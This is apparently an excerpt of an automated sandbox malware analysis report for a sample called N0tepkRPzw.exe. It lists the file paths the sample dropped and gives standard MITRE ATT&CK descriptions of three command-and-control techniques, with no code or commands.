C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

C:\Program Files\7-Zip\Lang\c4950d50751633

C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

C:\ProgramData\Microsoft OneDrive\c4950d50751633

C:\ProgramData\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

C:\Recovery\c4950d50751633

C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

C:\Users\Default\Favorites\c4950d50751633

C:\Users\Default\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\blockServerruntime.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\qVUjshNEHYUOCXyHyUMQwFlZoe.exe.log

C:\Windows\Provisioning\Packages\c4950d50751633

C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Windows Analysis Report
N0tepkRPzw.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre